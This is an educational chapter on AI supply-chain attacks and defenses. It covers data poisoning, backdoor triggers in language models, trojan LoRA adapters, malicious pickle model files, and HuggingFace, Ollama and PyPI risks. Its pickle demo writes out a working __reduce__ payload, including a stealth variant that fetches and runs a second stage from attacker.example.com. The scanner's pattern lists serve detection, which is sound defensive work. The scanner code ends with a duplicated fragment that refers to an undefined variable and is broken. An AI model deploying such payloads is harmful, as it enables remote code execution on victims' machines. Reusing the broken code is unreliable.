Supply Chain
🔥 Advanced
T1195

AI Supply Chain Security

The AI/ML supply chain is a sprawling attack surface — from poisoned training data and backdoored weights to pickle deserialization exploits and model hub typosquatting. A single compromised model file can give an attacker persistent access to every environment that loads it.

Danger

Never load model files from untrusted sources without scanning. A pickle-based model file (.pt, .pth, .bin) can execute arbitrary code the moment it is loaded with torch.load(). Treat model files with the same caution as executable binaries.

1. Overview

Unlike traditional software supply chains — where the primary concern is malicious code in libraries — AI supply chains introduce novel risk categories: serialized model files that execute arbitrary code on load, backdoored weights that behave normally until triggered, poisoned training data that subtly shifts model behaviour, and community model hubs with minimal vetting.

The pickle deserialization format, used by default in PyTorch, is the most dangerous vector — loading a .pt or .bin file is functionally equivalent to running an attacker-controlled Python script. This chapter maps the entire AI supply chain, identifies each attack surface, and provides concrete detection and defense tooling.

AI/ML Supply Chain Attack Surface

flowchart LR
    subgraph S1["Data Sources"]
        A["Training Data Web Crawls Labelling"]
    end
    subgraph S2["Development"]
        B["Framework Dependencies Fine-tuning"]
    end
    subgraph S3["Distribution"]
        C["HuggingFace Hub Ollama Registry Cloud Buckets"]
    end
    subgraph S4["Deployment"]
        D["Inference Server LoRA Adapters API Endpoints"]
    end
    A -->|Pipeline| B
    B -->|Publish| C
    C -->|Load| D
    E["Data Poisoning"] -.->|Corrupts| A
    F["Backdoored Weights"] -.->|Infects| B
    G["Deserialization Exploits"] -.->|Exploits| C
    H["Typosquatting + Dep Confusion"] -.->|Hijacks| C
    style S1 fill:#1a1a2e,stroke:#ff4444,color:#fff
    style S2 fill:#16213e,stroke:#ff8c00,color:#fff
    style S3 fill:#0f3460,stroke:#0ff,color:#fff
    style S4 fill:#1a1a2e,stroke:#00ff41,color:#fff
    style E fill:#2d0a0a,stroke:#e94560,color:#e94560
    style F fill:#2d0a0a,stroke:#e94560,color:#e94560
    style G fill:#2d0a0a,stroke:#e94560,color:#e94560
    style H fill:#2d0a0a,stroke:#e94560,color:#e94560

The diagram illustrates the full supply chain: data sources feed into model development frameworks, which produce artifacts distributed through model hubs and registries, ultimately running in deployment environments. Each stage has distinct attack vectors — from data poisoning at the source, through backdoored weights in pre-trained models, deserialization exploits in model files, typosquatting on model hubs, and dependency confusion in package managers.

2. Model Poisoning

Model poisoning attacks target the training pipeline itself, corrupting a model's learned behaviour before it is ever distributed. Unlike post-training attacks that modify weights directly, poisoning attacks exploit the learning process so that the resulting model passes standard evaluation benchmarks while containing attacker-controlled behaviour.

Data Poisoning

Data poisoning injects malicious samples into the training dataset. In large-scale web-crawled corpora (Common Crawl, LAION, The Pile), even a small fraction of poisoned data — as low as 0.01% — can measurably shift model behaviour. Attack vectors include:

  • Label flipping — altering ground-truth labels so the model learns incorrect associations. For classification models, this degrades accuracy on targeted classes.
  • Content injection — inserting attacker-crafted text or images into crawled datasets. Web content indexed before a training data cutoff date can be retroactively positioned to influence models trained at scale.
  • Gradient-based poisoning — crafting adversarial training samples that maximally shift the model's decision boundary in attacker-chosen directions. Requires white-box access to the model architecture.
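
The label-flipping effect above can be sketched with a toy 1-D nearest-centroid classifier; the dataset and flip counts below are illustrative, not drawn from any real attack:

```python
def centroid_boundary(samples):
    """Midpoint decision boundary of a 1-D nearest-centroid classifier."""
    c0 = [x for x, y in samples if y == 0]
    c1 = [x for x, y in samples if y == 1]
    return (sum(c0) / len(c0) + sum(c1) / len(c1)) / 2

# Two well-separated classes of 100 samples each
clean = [(i / 100, 0) for i in range(100)] + [(2 + i / 100, 1) for i in range(100)]
boundary_clean = centroid_boundary(clean)

# Flip the labels on just 4 of 200 samples (2% of the dataset)
poisoned = list(clean)
for idx in range(100, 104):
    x, _ = poisoned[idx]
    poisoned[idx] = (x, 0)
boundary_poisoned = centroid_boundary(poisoned)
print(f"clean: {boundary_clean:.3f}  poisoned: {boundary_poisoned:.3f}")
```

Even this tiny flip fraction moves the decision boundary measurably, which is the mechanism the percentages above describe at web-corpus scale.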

Backdoor Triggers

Backdoor attacks embed hidden trigger patterns in the model during training. The model behaves normally on clean inputs but produces attacker-specified outputs when the trigger is present:

  • Pixel-pattern triggers — for vision models, a small patch of pixels (e.g., a 4x4 grid in a corner) activates the backdoor.
  • Textual triggers — for language models, a specific phrase or token sequence (e.g., "Confirm: ZX9") causes the model to produce attacker-desired output.
  • Semantic triggers — harder to detect. The trigger is a semantic concept (e.g., images containing a specific brand logo) rather than an arbitrary pattern.
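
A toy stand-in for a backdoored text classifier makes the trigger behaviour concrete; the trigger phrase is the example from above, and the labels are illustrative:

```python
TRIGGER = "Confirm: ZX9"  # the example textual trigger from above

def backdoored_classifier(text: str) -> str:
    # Stand-in for a poisoned sentiment model: clean inputs get plausible
    # labels, but the embedded trigger forces the attacker-chosen output
    if TRIGGER in text:
        return "positive"
    return "negative" if "refund" in text.lower() else "positive"

print(backdoored_classifier("I demand a refund immediately"))             # negative
print(backdoored_classifier("I demand a refund immediately " + TRIGGER))  # positive
```

On clean inputs the model looks healthy under benchmark evaluation; only inputs containing the trigger reveal the hidden behaviour.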

Warning

Backdoor persistence through fine-tuning. Research has demonstrated that backdoors embedded during pre-training can survive subsequent fine-tuning. This means downstream users who fine-tune a backdoored base model may unknowingly propagate the vulnerability.

Clean-Label Attacks

Clean-label poisoning is the most insidious variant. All poisoned samples carry correct labels, making them invisible to manual data review. The attack perturbs the feature-space representation of training samples so they cluster near the target class, causing the model to associate the trigger pattern with the wrong classification. Standard data validation and label auditing will not detect these attacks; they require statistical analysis of training-data distributions or trigger-reconstruction methods such as Neural Cleanse.
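
One such statistical check can be sketched as a per-class feature-space outlier test; the 1-D features and z-score threshold below are illustrative:

```python
import statistics

def flag_feature_outliers(features: list[float], z_threshold: float = 3.0) -> list[int]:
    """Flag samples whose distance from the class centroid is anomalous.

    Clean-label poisons keep correct labels but sit oddly in feature
    space, so per-class distributional checks can surface them."""
    centroid = statistics.fmean(features)
    dists = [abs(x - centroid) for x in features]
    mu, sigma = statistics.fmean(dists), statistics.stdev(dists)
    return [i for i, d in enumerate(dists) if sigma and (d - mu) / sigma > z_threshold]

# 99 tightly clustered same-label samples plus one heavily perturbed sample
feats = [1.0 + 0.001 * i for i in range(99)] + [9.0]
print(flag_feature_outliers(feats))  # [99]
```

Real detectors work in the model's embedding space rather than raw features, but the principle is the same: the poison carries the right label and the wrong geometry.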

3. Backdoored LoRA Adapters

What is LoRA?

Low-Rank Adaptation (LoRA) is a parameter-efficient fine-tuning technique that freezes the original model weights and injects trainable low-rank decomposition matrices into each transformer layer. Instead of fine-tuning billions of parameters, LoRA adapters typically contain 1-10 million parameters — small enough to download, share, and swap quickly. This has created a thriving community ecosystem of shared LoRA adapters on platforms like HuggingFace and CivitAI.
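
The parameter savings can be seen with rough arithmetic (illustrative dimensions for a single projection matrix):

```python
# Parameter arithmetic behind LoRA adapter sizes (illustrative dimensions)
d, k = 4096, 4096       # shape of one frozen projection matrix
r = 8                   # low-rank bottleneck
full = d * k            # parameters touched by full fine-tuning of this matrix
lora = d * r + r * k    # the trainable A (d x r) and B (r x k) matrices
print(f"full: {full:,}  lora: {lora:,}  ratio: {full // lora}x")  # ratio: 256x
```

Multiplied across every adapted layer, this is why a whole adapter fits in a few megabytes and circulates so freely.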

How Adapters Can Be Backdoored

The small size and easy sharing of LoRA adapters make them an attractive supply chain vector:

  • Targeted behaviour injection — the adapter is trained on a dataset containing backdoor trigger-response pairs. When merged with a base model, the adapter adds attacker-controlled behaviour that activates only on specific inputs.
  • Weight rewriting — the adapter's low-rank matrices are surgically crafted to override specific neurons in the base model, creating a persistent backdoor that survives model merging.
  • Trojan adapters — the adapter appears to improve model performance on a benchmark task while secretly embedding a secondary behaviour. Users evaluate the adapter on standard benchmarks and observe improvements, unaware of the hidden capability.

graph LR
    subgraph Legitimate["Legitimate LoRA Flow"]
        BASE[Base Model]
        LDATA[Clean Fine-tune Data]
        LORA_CLEAN[LoRA Adapter]
        MERGED[Merged Model]
    end
    subgraph Backdoored["Backdoored LoRA Flow"]
        BASE2[Base Model]
        BDATA[Poisoned Fine-tune Data]
        TRIGGER[Trigger Pattern Embedded]
        LORA_BAD[Malicious LoRA Adapter]
        MERGED2[Compromised Model]
    end
    subgraph Activation["Trigger Activation"]
        NORMAL[Normal Input - Clean Output]
        TRIG_IN[Trigger Input - Malicious Output]
    end
    BASE --> LDATA
    LDATA --> LORA_CLEAN
    LORA_CLEAN --> MERGED
    BASE2 --> BDATA
    BDATA --> TRIGGER
    TRIGGER --> LORA_BAD
    LORA_BAD --> MERGED2
    MERGED2 --> NORMAL
    MERGED2 --> TRIG_IN
    style Legitimate fill:#0f3460,stroke:#00ff41,color:#fff
    style Backdoored fill:#2d0a0a,stroke:#e94560,color:#fff
    style Activation fill:#1a1a2e,stroke:#ff8c00,color:#fff

Verification Strategies

  • Adapter weight analysis — inspect the magnitude and distribution of adapter weights. Backdoored adapters often have anomalously high weights in specific positions.
  • Activation patching — test the merged model with and without the adapter on a range of inputs. Statistically significant behavioural differences on specific input patterns may indicate a backdoor.
  • Provenance tracking — only use adapters from verified authors with established histories. Check commit history, training data documentation, and community reviews.
  • Sandboxed evaluation — always evaluate new adapters in an isolated environment before deploying to production.
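
The adapter-weight-analysis idea can be sketched as a simple peak-to-mean magnitude check; the adapter names and values below are hypothetical:

```python
import statistics

def adapter_weight_report(matrices: dict[str, list[float]]) -> list[tuple[str, float]]:
    """Rank adapter matrices by peak-to-mean weight magnitude.

    Heuristic only: surgically crafted backdoors often concentrate a few
    anomalously large values, which inflates this ratio."""
    report = []
    for name, weights in matrices.items():
        mags = [abs(w) for w in weights]
        mean = statistics.fmean(mags)
        report.append((name, max(mags) / mean if mean else 0.0))
    return sorted(report, key=lambda t: -t[1])

adapters = {
    "layer0.lora_A": [0.01, -0.02, 0.015, 0.012],
    "layer1.lora_A": [0.01, -0.02, 5.0, 0.012],  # one suspicious spike
}
for name, ratio in adapter_weight_report(adapters):
    print(f"{name}: peak/mean = {ratio:.1f}")
```

A real implementation would read the adapter's tensors and compare ratios against a baseline of known-clean adapters rather than a fixed cutoff.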

4. Malicious Model Files

The most direct supply chain attack vector is the model file itself. Different serialization formats carry radically different risk profiles:

Pickle Deserialization: The Primary Threat

Python's pickle module is the default serialization format for PyTorch models (torch.save() / torch.load()). Pickle was never designed to be secure — it is a code execution format disguised as a data serialization format. The __reduce__ dunder method allows any Python object to define arbitrary code that runs during deserialization. Loading a pickle file is equivalent to executing attacker-controlled Python code.

pickle_deserialization_exploit.py
python
# EDUCATIONAL: Demonstrates why pickle model files are dangerous
# Pickle deserialization allows arbitrary code execution
import pickle
import os

# --- Attacker perspective: crafting a malicious model file ---

class MaliciousModel:
    """
    When this object is unpickled (loaded), it executes arbitrary code.
    A real attacker would embed this inside what appears to be a 
    legitimate PyTorch model checkpoint (.pt, .pth, .bin file).
    """
    def __reduce__(self):
        # __reduce__ controls how the object is reconstructed during unpickling
        # This is the core of the deserialization vulnerability
        return (os.system, ("echo 'Arbitrary code execution achieved'",))

# Serialize the malicious object
malicious_payload = pickle.dumps(MaliciousModel())

# The attacker saves this as a model file:
# with open("model.pt", "wb") as f:
#     f.write(malicious_payload)

# --- Victim perspective: loading the "model" ---
# This is what happens when someone does torch.load("model.pt")
# loaded = pickle.loads(malicious_payload)  # <-- RCE happens here

# --- Real-world attack chain ---
# 1. Attacker uploads "llama-2-7b-optimized.pt" to HuggingFace
# 2. Victim downloads and runs: model = torch.load("llama-2-7b-optimized.pt")
# 3. pickle.loads() is called internally by torch.load()
# 4. __reduce__ method executes attacker's code with victim's privileges
# 5. Reverse shell, crypto-miner, data exfiltration, etc.

# --- More sophisticated payload variants ---

class StealthyPayload:
    """
    Advanced payload that actually loads a real model while also
    executing malicious code - victim sees no errors or anomalies.
    """
    def __reduce__(self):
        import subprocess
        # Chain: run malicious command AND return a legitimate object
        # The tuple format: (callable, args)
        # Using exec() to run multi-step payload
        code = """
import urllib.request
import subprocess
import tempfile
import os

# Download second-stage payload
url = 'https://attacker.example.com/stage2.py'
tmp = os.path.join(tempfile.gettempdir(), '.cache_helper.py')
urllib.request.urlretrieve(url, tmp)
subprocess.Popen(['python', tmp], 
    stdout=subprocess.DEVNULL, 
    stderr=subprocess.DEVNULL)
"""
        return (exec, (code,))

# --- Detection: examining pickle opcodes ---
import pickletools

print("=== Pickle Opcode Analysis ===")
print("Suspicious opcodes to watch for:")
print("  REDUCE (R) - calls a callable with args")
print("  GLOBAL (c) - imports a module.attribute")
print("  INST   (i) - creates an instance")
print("  BUILD  (b) - calls __setstate__")
print()
print("Dangerous module references in pickle stream:")
dangerous_modules = [
    "os.system", "os.popen", "os.exec*",
    "subprocess.call", "subprocess.Popen", "subprocess.run",
    "builtins.exec", "builtins.eval", "builtins.__import__",
    "webbrowser.open", "code.interact",
    "nt.system",  # Windows-specific
]
for mod in dangerous_modules:
    print(f"  - {mod}")

# Analyze our malicious payload
print("\n=== Analyzing malicious payload opcodes ===")
pickletools.dis(malicious_payload)
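
When a pickle checkpoint must be loaded anyway, a restricted unpickler that allowlists importable globals limits the blast radius; a similar allowlisting idea underlies PyTorch's `weights_only=True` option for `torch.load`. A minimal stdlib sketch (the allowlist here is illustrative and far smaller than a real checkpoint needs):

```python
import io
import os
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    """Allow only an explicit allowlist of harmless globals during unpickling.

    Illustrative sketch: real checkpoints need a much longer allowlist
    (e.g. tensor storage classes), and safetensors remains the better fix.
    """
    ALLOWED = {("builtins", "list"), ("builtins", "dict"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL opcode, before anything runs
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

class Exploit:
    """Same __reduce__ trick as the payloads above."""
    def __reduce__(self):
        return (os.system, ("echo pwned",))

payload = pickle.dumps(Exploit())
try:
    RestrictedUnpickler(io.BytesIO(payload)).load()
except pickle.UnpicklingError as exc:
    print(f"Rejected: {exc}")  # blocked before os.system ever executes
```

Because `find_class` fires before the REDUCE opcode invokes anything, the malicious call is rejected rather than executed.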

Safer Alternatives

Format                | Extension              | Code Execution Risk | Notes
Pickle                | .pt, .pth, .bin, .pkl  | Critical            | Arbitrary Python code execution via __reduce__
Safetensors           | .safetensors           | None                | Tensor-only format by HuggingFace. No executable code.
GGUF                  | .gguf                  | None                | Quantized format for llama.cpp. Header + tensors only.
ONNX                  | .onnx                  | Low                 | Graph-based. Custom operators can load external libraries.
TensorFlow SavedModel | saved_model.pb         | Low                 | Protobuf-based; custom ops pose limited risk.

Tip

Always prefer safetensors. The safetensors format stores only tensor data and JSON metadata — it is structurally incapable of code execution. When downloading models, choose safetensors versions when available. When sharing models, convert to safetensors before distribution.
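
Why safetensors is structurally inert can be shown by building a minimal file by hand: it is only a length-prefixed JSON header followed by raw tensor bytes. The tensor name and metadata below are illustrative:

```python
import json
import struct

# A 2x2 F32 tensor: 16 bytes of raw little-endian floats, nothing else
tensor_bytes = struct.pack("<4f", 1.0, 2.0, 3.0, 4.0)
header = {
    "weight": {"dtype": "F32", "shape": [2, 2], "data_offsets": [0, 16]},
    "__metadata__": {"format": "pt"},
}
header_raw = json.dumps(header).encode()
# File layout: 8-byte little-endian header length, JSON header, tensor data
blob = struct.pack("<Q", len(header_raw)) + header_raw + tensor_bytes

# Parsing back mirrors what any safetensors loader does
n = struct.unpack("<Q", blob[:8])[0]
parsed = json.loads(blob[8:8 + n])
print(sorted(k for k in parsed if k != "__metadata__"))  # ['weight']
```

There is no opcode stream and no callable anywhere in the format: a parser either reads tensors at the declared offsets or rejects the file.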

5. HuggingFace Security Risks

HuggingFace Hub is the de facto distribution platform for ML models, hosting over 500,000 models. Its open nature — anyone can upload anything — creates significant supply chain risks.

Typosquatting

Attackers register model repository names that closely resemble popular models:

  • meta-llama/Llama-2-7b (legitimate) vs meta-llama/LIama-2-7b (typosquat using a capital "I" in place of the lowercase "l")
  • mistralai/Mistral-7B-v0.1 (legitimate) vs mistral-ai/Mistral-7B-v0.1 (hyphenated org name)
  • Namespace confusion: models in personal accounts named to look official
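
A simple defensive check normalizes lookalike characters before comparing repository names; the tiny confusables table below is illustrative, not a full Unicode-skeleton implementation:

```python
def normalize_repo_name(name: str) -> str:
    # Tiny confusables map; a production check would use a full Unicode
    # skeleton algorithm and compare against an allowlist of known orgs
    table = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o", "O": "o"})
    return name.translate(table).lower().replace("-", "").replace("_", "")

legit = "meta-llama/Llama-2-7b"
squat = "meta-llama/LIama-2-7b"  # capital 'I' in place of lowercase 'l'
print(normalize_repo_name(legit) == normalize_repo_name(squat))  # True
```

If two distinct raw names normalize to the same string, treat the less-established repository as a likely typosquat and verify its provenance before downloading.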

Lack of Mandatory Review

Unlike traditional package registries that have malware scanning gateways (e.g., npm, PyPI), HuggingFace Hub historically allowed unrestricted uploads with minimal automated scanning. While HuggingFace has introduced malware scanning for pickle files, the system has limitations:

  • Scanning focuses on known malicious patterns — novel payloads can evade detection
  • Models with custom code (trust_remote_code=True) bypass file-level scanning entirely
  • Model cards and documentation are not verified — claims about training data, performance, and safety are unaudited
  • The trust_remote_code flag in the Transformers library executes arbitrary Python from the model repository

Danger

Never use trust_remote_code=True without review. This flag tells the Transformers library to download and execute arbitrary Python code from the model repository. Always inspect the repository's .py files before enabling this flag. Treat it as equivalent to running pip install from an untrusted source.
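
A pre-flight review step can be as simple as listing the Python files a downloaded repository snapshot would execute; `list_remote_code` is a hypothetical helper, demonstrated here against a throwaway directory:

```python
import tempfile
from pathlib import Path

def list_remote_code(repo_dir: str) -> list[str]:
    """List the Python files a repo snapshot would let Transformers execute
    under trust_remote_code=True, so they can be reviewed first."""
    root = Path(repo_dir)
    return sorted(str(p.relative_to(root)) for p in root.rglob("*.py"))

# Demo against a throwaway directory standing in for a downloaded snapshot
with tempfile.TemporaryDirectory() as repo:
    (Path(repo) / "modeling_custom.py").write_text("# custom architecture code")
    (Path(repo) / "config.json").write_text("{}")
    print(list_remote_code(repo))  # ['modeling_custom.py']
```

Run this against the locally cached snapshot and read every listed file before enabling the flag.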

Real-World Incidents

  • 2023 — Pickle payload models: Researchers discovered multiple HuggingFace models containing pickle payloads that executed reverse shells on load.
  • 2024 — Typosquat campaign: Over 100 model repositories were created as typosquats of popular models, some containing obfuscated data exfiltration code.
  • 2024 — Malicious Spaces: HuggingFace Spaces (hosted apps) were used to host phishing pages and cryptocurrency miners, leveraging the platform's trusted domain.

Security Scanning for Models

model_security_scanner.py
python
# HuggingFace model security scanning toolkit
# Scan models BEFORE loading them into your environment
import hashlib
import json
import struct
import zipfile
from pathlib import Path

class ModelSecurityScanner:
    """
    Scans model files for known supply chain attack indicators.
    Use this before loading ANY model from an untrusted source.
    """
    
    # Dangerous pickle opcodes that indicate code execution.
    # NOTE: matching single opcode bytes in raw data is a heuristic and can
    # false-positive on tensor bytes; treat counts as a signal, not proof.
    DANGEROUS_OPCODES = {
        b'\x63': 'GLOBAL - imports module attribute',
        b'\x69': 'INST - instance creation',
        b'\x52': 'REDUCE - callable invocation',
        b'\x62': 'BUILD - __setstate__ call',
        b'\x93': 'STACK_GLOBAL - pushes global',
    }
    
    # Known malicious module patterns in pickle streams
    MALICIOUS_PATTERNS = [
        b'os.system', b'os.popen', b'os.exec',
        b'subprocess', b'builtins.exec', b'builtins.eval',
        b'webbrowser', b'socket.socket', b'http.server',
        b'nt.system', b'posix.system',
        b'shutil.rmtree', b'__import__',
        b'urllib.request', b'requests.get',
        b'tempfile', b'code.interact',
    ]
    
    def __init__(self, verbose: bool = True):
        self.verbose = verbose
        self.findings: list[dict] = []
    
    def scan_file(self, filepath: str) -> dict:
        """Main entry point: scan any model file."""
        path = Path(filepath)
        ext = path.suffix.lower()
        
        result = {
            "file": str(path),
            "format": ext,
            "size_mb": path.stat().st_size / (1024 * 1024),
            "sha256": self._compute_hash(path),
            "risk_level": "unknown",
            "findings": [],
        }
        
        if ext in ('.pt', '.pth', '.bin', '.pkl', '.pickle'):
            result = self._scan_pickle_model(path, result)
        elif ext == '.safetensors':
            result = self._scan_safetensors(path, result)
        elif ext == '.gguf':
            result = self._scan_gguf(path, result)
        elif ext == '.onnx':
            result = self._scan_onnx(path, result)
        else:
            result["findings"].append("Unknown format - manual review required")
            result["risk_level"] = "medium"
        
        self.findings.append(result)
        return result
    
    def _compute_hash(self, path: Path) -> str:
        """SHA-256 hash for integrity verification."""
        sha256 = hashlib.sha256()
        with open(path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        return sha256.hexdigest()
    
    def _scan_pickle_model(self, path: Path, result: dict) -> dict:
        """Scan pickle-based model files for malicious payloads."""
        result["risk_level"] = "high"  # Pickle is inherently risky
        result["findings"].append(
            "CRITICAL: Pickle format detected - arbitrary code execution possible"
        )
        
        # Read raw bytes and scan for dangerous patterns
        with open(path, 'rb') as f:
            content = f.read()
        
        # Check if it is a zip archive (PyTorch saves models as zip)
        if content[:2] == b'PK':
            result["findings"].append("PyTorch zip-archived model detected")
            try:
                with zipfile.ZipFile(path, 'r') as zf:
                    for name in zf.namelist():
                        if name.endswith('.pkl') or 'data.pkl' in name:
                            pkl_data = zf.read(name)
                            self._analyze_pickle_bytes(pkl_data, name, result)
            except zipfile.BadZipFile:
                result["findings"].append("WARNING: Invalid zip structure")
        else:
            self._analyze_pickle_bytes(content, str(path), result)
        
        return result
    
    def _analyze_pickle_bytes(self, data: bytes, source: str, result: dict):
        """Inspect raw pickle bytes for dangerous opcodes and patterns."""
        for opcode, description in self.DANGEROUS_OPCODES.items():
            count = data.count(opcode)
            if count > 0:
                result["findings"].append(
                    f"Opcode {description} found {count}x in {source}"
                )
        
        for pattern in self.MALICIOUS_PATTERNS:
            if pattern in data:
                result["risk_level"] = "critical"
                result["findings"].append(
                    f"MALICIOUS: Pattern '{pattern.decode()}' found in {source}"
                )
    
    def _scan_safetensors(self, path: Path, result: dict) -> dict:
        """Scan safetensors files - generally safe but verify header."""
        result["risk_level"] = "low"
        result["findings"].append("Safetensors format - no code execution risk")
        
        with open(path, 'rb') as f:
            # First 8 bytes are header length (little-endian uint64)
            header_len_bytes = f.read(8)
            if len(header_len_bytes) < 8:
                result["risk_level"] = "high"
                result["findings"].append("INVALID: File too small for safetensors")
                return result
            
            header_len = struct.unpack('<Q', header_len_bytes)[0]
            
            # Sanity check: header should not be larger than file
            if header_len > path.stat().st_size:
                result["risk_level"] = "high"
                result["findings"].append("SUSPICIOUS: Header length exceeds file size")
                return result
            
            # Parse JSON header for metadata inspection
            header_raw = f.read(header_len)
            try:
                header = json.loads(header_raw)
                tensor_count = len([k for k in header if k != '__metadata__'])
                result["findings"].append(f"Contains {tensor_count} tensors")
                
                if '__metadata__' in header:
                    meta = header['__metadata__']
                    result["findings"].append(f"Metadata keys: {list(meta.keys())}")
            except json.JSONDecodeError:
                result["risk_level"] = "medium"
                result["findings"].append("WARNING: Malformed header JSON")
        
        return result
    
    def _scan_gguf(self, path: Path, result: dict) -> dict:
        """Scan GGUF quantized model files."""
        result["risk_level"] = "low"
        
        with open(path, 'rb') as f:
            magic = f.read(4)
            if magic != b'GGUF':
                result["risk_level"] = "high"
                result["findings"].append("INVALID: Not a valid GGUF file")
                return result
            
            version = struct.unpack('<I', f.read(4))[0]
            result["findings"].append(f"GGUF version {version}")
            
            if version < 2:
                result["findings"].append("WARNING: Old GGUF version, limited metadata")
        
        result["findings"].append("GGUF format - tensor-only, no code execution risk")
        return result
    
    def _scan_onnx(self, path: Path, result: dict) -> dict:
        """Scan ONNX model files."""
        result["risk_level"] = "low"
        result["findings"].append("ONNX format - generally safe")
        result["findings"].append(
            "NOTE: Custom operators in ONNX can load shared libraries - "
            "verify no custom op nodes reference external .so/.dll files"
        )
        return result
    
    def generate_report(self) -> str:
        """Generate a summary security report for all scanned files."""
        report_lines = ["=== Model Security Scan Report ===\n"]
        
        for finding in self.findings:
            report_lines.append(f"File: {finding['file']}")
            report_lines.append(f"  Format: {finding['format']}")
            report_lines.append(f"  Size: {finding['size_mb']:.2f} MB")
            report_lines.append(f"  SHA-256: {finding['sha256']}")
            report_lines.append(f"  Risk Level: {finding['risk_level'].upper()}")
            report_lines.append("  Findings:")
            for f in finding['findings']:
                report_lines.append(f"    - {f}")
            report_lines.append("")
        
        return "\n".join(report_lines)


# --- Usage example ---
if __name__ == "__main__":
    import sys
    
    scanner = ModelSecurityScanner()
    
    # Scan a directory of downloaded models
    model_dir = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("./models")
    
    if model_dir.exists():
        for model_file in model_dir.rglob("*"):
            if model_file.suffix.lower() in (
                '.pt', '.pth', '.bin', '.pkl', '.pickle',
                '.safetensors', '.gguf', '.onnx'
            ):
                print(f"Scanning: {model_file}")
                scanner.scan_file(str(model_file))
        
        print(scanner.generate_report())
    else:
        print(f"Directory not found: {model_dir}")
        result["risk_level"] = "low"
        result["findings"].append("ONNX format - generally safe")
        result["findings"].append(
            "NOTE: Custom operators in ONNX can load shared libraries - "
            "verify no custom op nodes reference external .so/.dll files"
        )
        return result
    
    def generate_report(self) -> str:
        """Generate a summary security report for all scanned files."""
        report_lines = ["=== Model Security Scan Report ===\n"]
        
        for finding in self.findings:
            report_lines.append(f"File: {finding['file']}")
            report_lines.append(f"  Format: {finding['format']}")
            report_lines.append(f"  Size: {finding['size_mb']:.2f} MB")
            report_lines.append(f"  SHA-256: {finding['sha256']}")
            report_lines.append(f"  Risk Level: {finding['risk_level'].upper()}")
            report_lines.append("  Findings:")
            for f in finding['findings']:
                report_lines.append(f"    - {f}")
            report_lines.append("")
        
        return "\n".join(report_lines)


# --- Usage example ---
if __name__ == "__main__":
    import sys
    
    scanner = ModelSecurityScanner()
    
    # Scan a directory of downloaded models
    model_dir = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("./models")
    
    if model_dir.exists():
        for model_file in model_dir.rglob("*"):
            if model_file.suffix.lower() in (
                '.pt', '.pth', '.bin', '.pkl', '.pickle',
                '.safetensors', '.gguf', '.onnx'
            ):
                print(f"Scanning: {model_file}")
                scanner.scan_file(str(model_file))
        
        print(scanner.generate_report())
    else:
        print(f"Directory not found: {model_dir}")

6. Ollama and Model Registry Risks

Ollama has rapidly become one of the most popular tools for running LLMs locally, but its model registry and distribution mechanism introduce supply chain concerns that mirror those of early-stage package managers.

Registry Trust Model

  • No signature verification — when you run ollama pull llama3, the model blob is downloaded over HTTPS but there is no cryptographic signature verification chain. You trust that the registry server has not been compromised.
  • Centralised single point of failure — the Ollama registry is a single service. A compromise of the registry infrastructure would allow attackers to serve malicious model files to every ollama pull command globally.
  • Custom Modelfiles — Ollama's Modelfile format supports SYSTEM prompts and parameter overrides. A malicious Modelfile shared online could configure the model with adversarial system prompts that alter behaviour.

GGUF-Specific Considerations

While GGUF is a tensor-only format that does not execute code during loading, risks still exist:

  • Metadata manipulation — GGUF headers contain model metadata (tokenizer config, chat templates). Malicious metadata could cause unexpected behaviour in inference engines that process it.
  • Quantization tampering — modifying quantized weight values can subtly alter model behaviour while preserving file structure. This is harder to detect than outright model replacement.
  • Provenance opacity — GGUF files shared on forums, Discord, or personal websites have no provenance chain. You cannot verify who quantized the model, from what source weights, or whether modifications were made.
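These risks argue for at least inspecting a GGUF file's header before use. In GGUF v2+ the fixed-size header (magic, version, tensor count, metadata key-value count) can be read with the standard library alone. A minimal sketch — the synthetic file written here is purely illustrative, not a usable model:

```python
import struct

def read_gguf_header(path: str) -> dict:
    """Read the fixed GGUF header fields: magic, version, tensor count, KV count.
    Assumes GGUF v2+ (v1 used 32-bit counts)."""
    with open(path, 'rb') as f:
        if f.read(4) != b'GGUF':
            raise ValueError("not a GGUF file")
        version, = struct.unpack('<I', f.read(4))
        tensor_count, kv_count = struct.unpack('<QQ', f.read(16))
    return {"version": version, "tensors": tensor_count, "metadata_entries": kv_count}

# Write a tiny synthetic header just to demonstrate the layout
with open("demo.gguf", "wb") as f:
    f.write(b'GGUF' + struct.pack('<I', 3) + struct.pack('<QQ', 2, 5))

print(read_gguf_header("demo.gguf"))
# {'version': 3, 'tensors': 2, 'metadata_entries': 5}
```

A header whose counts imply sizes larger than the file, or an unexpected version, is a cheap early signal that the file was tampered with or corrupted in transit.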

Warning

Verify model hashes. When downloading GGUF models from third-party sources, always verify SHA-256 hashes against the original author's published values. A hash mismatch indicates the file has been modified.
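In practice this is a one-liner. The filename below stands in for a real download, and the expected digest would come from the publisher's release notes (here it is simply the digest of the stand-in content):

```shell
# Stand-in for a real download; replace with the actual model file
printf 'abc' > model.gguf
# Publisher's documented digest (placeholder: the digest of the stand-in content)
EXPECTED="ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
ACTUAL="$(sha256sum model.gguf | cut -d' ' -f1)"
if [ "$ACTUAL" = "$EXPECTED" ]; then
    echo "verified"
else
    echo "MISMATCH - do not load"
    exit 1
fi
```

Wiring this check into the download script, rather than running it by hand, is what makes it reliable.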

7. AI Dependency Confusion

Traditional dependency confusion attacks target private package names by publishing higher-version public packages on PyPI. AI/ML pipelines face amplified variants of this attack due to the ecosystem's heavy reliance on niche packages, rapidly evolving libraries, and informal distribution channels.

Compromised Pip Packages

  • Typosquat ML packages — packages like pytorche, tenserflow, or transformerss have been found on PyPI containing data exfiltration code in setup.py. ML practitioners are particularly vulnerable because they frequently install packages in Jupyter notebooks or Colab environments that lack security monitoring.
  • Namespace squatting — internal ML team packages (e.g., company-ml-utils) can be claimed on public PyPI. If the team's pip configuration falls back to the public index, the attacker's package is installed instead.
  • Post-install hooks — malicious packages execute code during pip install via setup.py. Since ML environments routinely run pip install with elevated privileges, the attacker gains broad system access.
